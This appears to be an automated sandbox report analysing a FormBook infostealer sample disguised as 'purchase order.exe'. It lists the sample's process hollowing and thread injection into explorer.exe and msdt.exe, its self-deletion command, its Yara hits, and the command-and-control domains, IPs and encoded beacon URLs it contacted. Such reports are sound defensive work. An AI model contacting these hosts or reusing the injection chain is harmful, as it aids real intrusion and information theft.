Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0486B02A mov eax, dword ptr fs:[00000030h] 5_2_0486B02A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0486B02A mov eax, dword ptr fs:[00000030h] 5_2_0486B02A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0486B02A mov eax, dword ptr fs:[00000030h] 5_2_0486B02A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0486B02A mov eax, dword ptr fs:[00000030h] 5_2_0486B02A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04870050 mov eax, dword ptr fs:[00000030h] 5_2_04870050
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04870050 mov eax, dword ptr fs:[00000030h] 5_2_04870050
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04912073 mov eax, dword ptr fs:[00000030h] 5_2_04912073
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04921074 mov eax, dword ptr fs:[00000030h] 5_2_04921074
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0487C182 mov eax, dword ptr fs:[00000030h] 5_2_0487C182
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0488A185 mov eax, dword ptr fs:[00000030h] 5_2_0488A185
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04882990 mov eax, dword ptr fs:[00000030h] 5_2_04882990
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048861A0 mov eax, dword ptr fs:[00000030h] 5_2_048861A0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048861A0 mov eax, dword ptr fs:[00000030h] 5_2_048861A0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048D69A6 mov eax, dword ptr fs:[00000030h] 5_2_048D69A6
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048D51BE mov eax, dword ptr fs:[00000030h] 5_2_048D51BE
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048D51BE mov eax, dword ptr fs:[00000030h] 5_2_048D51BE
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048D51BE mov eax, dword ptr fs:[00000030h] 5_2_048D51BE
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048D51BE mov eax, dword ptr fs:[00000030h] 5_2_048D51BE
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_049149A4 mov eax, dword ptr fs:[00000030h] 5_2_049149A4
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_049149A4 mov eax, dword ptr fs:[00000030h] 5_2_049149A4
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_049149A4 mov eax, dword ptr fs:[00000030h] 5_2_049149A4
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_049149A4 mov eax, dword ptr fs:[00000030h] 5_2_049149A4
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0485B1E1 mov eax, dword ptr fs:[00000030h] 5_2_0485B1E1
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0485B1E1 mov eax, dword ptr fs:[00000030h] 5_2_0485B1E1
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0485B1E1 mov eax, dword ptr fs:[00000030h] 5_2_0485B1E1
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048E41E8 mov eax, dword ptr fs:[00000030h] 5_2_048E41E8
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04859100 mov eax, dword ptr fs:[00000030h] 5_2_04859100
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04859100 mov eax, dword ptr fs:[00000030h] 5_2_04859100
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04859100 mov eax, dword ptr fs:[00000030h] 5_2_04859100
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04874120 mov eax, dword ptr fs:[00000030h] 5_2_04874120
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04874120 mov eax, dword ptr fs:[00000030h] 5_2_04874120
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04874120 mov eax, dword ptr fs:[00000030h] 5_2_04874120
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04874120 mov eax, dword ptr fs:[00000030h] 5_2_04874120
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04874120 mov ecx, dword ptr fs:[00000030h] 5_2_04874120
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0488513A mov eax, dword ptr fs:[00000030h] 5_2_0488513A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0488513A mov eax, dword ptr fs:[00000030h] 5_2_0488513A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0487B944 mov eax, dword ptr fs:[00000030h] 5_2_0487B944
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0487B944 mov eax, dword ptr fs:[00000030h] 5_2_0487B944
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0485C962 mov eax, dword ptr fs:[00000030h] 5_2_0485C962
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0485B171 mov eax, dword ptr fs:[00000030h] 5_2_0485B171
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0485B171 mov eax, dword ptr fs:[00000030h] 5_2_0485B171
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0488D294 mov eax, dword ptr fs:[00000030h] 5_2_0488D294
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0488D294 mov eax, dword ptr fs:[00000030h] 5_2_0488D294
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048552A5 mov eax, dword ptr fs:[00000030h] 5_2_048552A5
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048552A5 mov eax, dword ptr fs:[00000030h] 5_2_048552A5
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048552A5 mov eax, dword ptr fs:[00000030h] 5_2_048552A5
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048552A5 mov eax, dword ptr fs:[00000030h] 5_2_048552A5
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048552A5 mov eax, dword ptr fs:[00000030h] 5_2_048552A5
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0486AAB0 mov eax, dword ptr fs:[00000030h] 5_2_0486AAB0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0486AAB0 mov eax, dword ptr fs:[00000030h] 5_2_0486AAB0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0488FAB0 mov eax, dword ptr fs:[00000030h] 5_2_0488FAB0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04882ACB mov eax, dword ptr fs:[00000030h] 5_2_04882ACB
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04882AE4 mov eax, dword ptr fs:[00000030h] 5_2_04882AE4
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0491AA16 mov eax, dword ptr fs:[00000030h] 5_2_0491AA16
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0491AA16 mov eax, dword ptr fs:[00000030h] 5_2_0491AA16
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04868A0A mov eax, dword ptr fs:[00000030h] 5_2_04868A0A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0485AA16 mov eax, dword ptr fs:[00000030h] 5_2_0485AA16
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0485AA16 mov eax, dword ptr fs:[00000030h] 5_2_0485AA16
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04855210 mov eax, dword ptr fs:[00000030h] 5_2_04855210
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04855210 mov ecx, dword ptr fs:[00000030h] 5_2_04855210
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04855210 mov eax, dword ptr fs:[00000030h] 5_2_04855210
Enables debug privileges
Source: C:\Users\user\Desktop\purchase order.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\purchase order.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\purchase order.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 154.3.112.106 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 192.252.210.84 80 Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\purchase order.exe Memory written: C:\Users\user\Desktop\purchase order.exe base: 400000 value starts with: 4D5A Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\purchase order.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\purchase order.exe Section loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\purchase order.exe Section loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\purchase order.exe Thread register set: target process: 3440 Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Thread register set: target process: 3440 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\purchase order.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\purchase order.exe Section unmapped: C:\Windows\SysWOW64\msdt.exe base address: F60000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\purchase order.exe Process created: C:\Users\user\Desktop\purchase order.exe C:\Users\user\Desktop\purchase order.exe Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\purchase order.exe' Jump to behavior
Source: explorer.exe, 00000003.00000002.600093828.0000000000EE0000.00000002.00000001.sdmp, msdt.exe, 00000005.00000002.601109998.00000000030E0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000002.600093828.0000000000EE0000.00000002.00000001.sdmp, msdt.exe, 00000005.00000002.601109998.00000000030E0000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000003.00000002.600093828.0000000000EE0000.00000002.00000001.sdmp, msdt.exe, 00000005.00000002.601109998.00000000030E0000.00000002.00000001.sdmp Binary or memory string: &Program Manager
Source: explorer.exe, 00000003.00000002.600093828.0000000000EE0000.00000002.00000001.sdmp, msdt.exe, 00000005.00000002.601109998.00000000030E0000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\purchase order.exe Queries volume information: C:\Users\user\Desktop\purchase order.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\purchase order.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\purchase order.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\purchase order.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\purchase order.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\purchase order.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\purchase order.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\purchase order.exe Code function: 0_2_06A2A4C0 GetUserNameA, 0_2_06A2A4C0
Source: C:\Users\user\Desktop\purchase order.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.394597129.00000000014A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.356215152.0000000003D27000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.599779534.0000000000E10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.599557812.0000000000950000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.394487409.0000000001470000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 2.2.purchase order.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.purchase order.exe.400000.0.unpack, type: UNPACKEDPE

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.394597129.00000000014A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.356215152.0000000003D27000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.599779534.0000000000E10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.599557812.0000000000950000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.394487409.0000000001470000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 2.2.purchase order.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.purchase order.exe.400000.0.unpack, type: UNPACKEDPE
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 323034 Sample: purchase order.exe Startdate: 26/11/2020 Architecture: WINDOWS Score: 100 31 www.keystonefulfillment.com 2->31 33 g.msn.com 2->33 41 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->41 43 Malicious sample detected (through community Yara rule) 2->43 45 Multi AV Scanner detection for submitted file 2->45 47 8 other signatures 2->47 11 purchase order.exe 3 2->11         started        signatures3 process4 file5 29 C:\Users\user\...\purchase order.exe.log, ASCII 11->29 dropped 57 Injects a PE file into a foreign processes 11->57 15 purchase order.exe 11->15         started        signatures6 process7 signatures8 59 Modifies the context of a thread in another process (thread injection) 15->59 61 Maps a DLL or memory area into another process 15->61 63 Sample uses process hollowing technique 15->63 65 Queues an APC in another process (thread injection) 15->65 18 explorer.exe 15->18 injected process9 dnsIp10 35 purehempbotanicalsinfo.com 154.3.112.106, 49759, 80 UNMETEREDCA United States 18->35 37 makgxoimisitzer.info 192.252.210.84, 49754, 80 TOTAL-SERVER-SOLUTIONSUS United States 18->37 39 4 other IPs or domains 18->39 49 System process connects to network (likely due to code injection or exploit) 18->49 22 msdt.exe 18->22         started        signatures11 process12 signatures13 51 Modifies the context of a thread in another process (thread injection) 22->51 53 Maps a DLL or memory area into another process 22->53 55 Tries to detect virtualization through RDTSC time measurements 22->55 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
34.102.136.180
 unknown United States
15169 GOOGLEUS true
154.3.112.106
 unknown United States
54133 UNMETEREDCA true
192.252.210.84
 unknown United States
46562 TOTAL-SERVER-SOLUTIONSUS true

Contacted Domains

Name IP Active
rettexo.com 34.102.136.180 true
makgxoimisitzer.info 192.252.210.84 true
www.keystonefulfillment.com 52.58.78.16 true
purehempbotanicalsinfo.com 154.3.112.106 true
www.makgxoimisitzer.info unknown unknown
www.rettexo.com unknown unknown
g.msn.com unknown unknown
www.purehempbotanicalsinfo.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.purehempbotanicalsinfo.com/sbmh/?0PJtBJ=h/URaQ6chuqxS5rd6TDMT0L901DFCS1Z5y5lZa0zhzexAXZp9SqL0GSPheeJSC1M62VUMIayeg==&jDHXG=aFNTklSp true
  • Avira URL Cloud: safe
 unknown
http://www.rettexo.com/sbmh/?0PJtBJ=kHp9H1tPAFmVsD64lxBGFA2zeARzx9tS7bJBiT/v97zwTY8F+uE1Nk95aq19aJdA0x4qnOoYAg==&jDHXG=aFNTklSp true
  • Avira URL Cloud: safe
 unknown
http://www.makgxoimisitzer.info/sbmh/?0PJtBJ=XEJriTYCOuK+SyY/9HWJgPQ+bcG3K3zE43eWtlfOSAWdxw4RjD6D9w7NiRikfKNtMf925IUbyw==&jDHXG=aFNTklSp true
  • Avira URL Cloud: safe
 unknown